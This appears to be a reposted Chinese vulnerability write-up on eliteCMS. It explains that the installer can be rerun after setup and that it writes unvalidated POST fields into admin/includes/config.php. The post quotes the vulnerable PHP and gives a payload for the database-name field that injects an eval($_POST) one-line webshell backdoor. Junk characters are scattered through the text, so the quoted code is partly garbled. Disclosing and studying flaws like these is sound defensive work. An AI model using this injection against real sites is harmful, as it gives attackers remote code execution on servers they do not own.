eliteCMS安装文件未验证 + 一句话写入安全漏洞

admin

eliteCMS的安装程序安装结束后未作锁定，导致黑客可以通过访问安装程序地址进行重复安装
2 u2 z+ |1 W3 u% U" S
, z2 X* q- j( J* w另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php
8 H" C9 ]. s, n( ]' i我们来看代码：
/ o( M3 _0 q! L4 s
* x, W/ {" b- _' R" T...
elseif ($_GET['step'] == "4") {
    $file = "../admin/includes/config.php";
    $write = "<?php\n";
    $write .= "/**\n";
    $write .= "*\n";
( ?7 q5 D) [# l! N8 V) Q7 ^    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
...略...
    $write .= "*\n";
    $write .= "*/\n";
    $write .= "\n";
+ i  T6 c5 F3 e  o- I) m5 k    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
4 _5 F$ @2 ]+ a  J, Y" e) b; m    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
# v4 x. }+ S! c    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
- A) Z( ~0 H8 q3 Y6 M    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
- n6 Q) A0 N( T4 g5 o! v8 g& u    $write .= "if (!\$connection) {\n";
    $write .= "        die(\"Database connection failed\" .mysql_error());\n";
# D- z2 c3 u6 U+ p: E4 {    $write .= "        \n";
    $write .= "} \n";
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
    $write .= "if (!\$db_select) {\n";
    $write .= "        die(\"Database select failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
: c; h, e8 L: e0 r% ~) X6 M    $write .= "?>\n";
; n* y' ?$ E/ F
    $writer = fopen($file, 'w');
...
$ x/ w: D! ]8 U
在看代码：

$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
, `9 {8 n  _9 q+ W7 q$_SESSION['DB_USER'] = $_POST['DB_USER'];
) x, H' [2 M; }5 ]$_SESSION['DB_PASS'] = $_POST['DB_PASS'];
0 I+ u9 g+ }- [( ^, a8 U) ]
取值未作任何验证
如果将数据库名POST数据：

3 w# @( V8 Y# K"?><?php eval($_POST[c]);?><?php

将导致一句话后门写入/admin/includes/config.php
1 u' I) X( M7 U8 v; p# b4 Y$ s$ r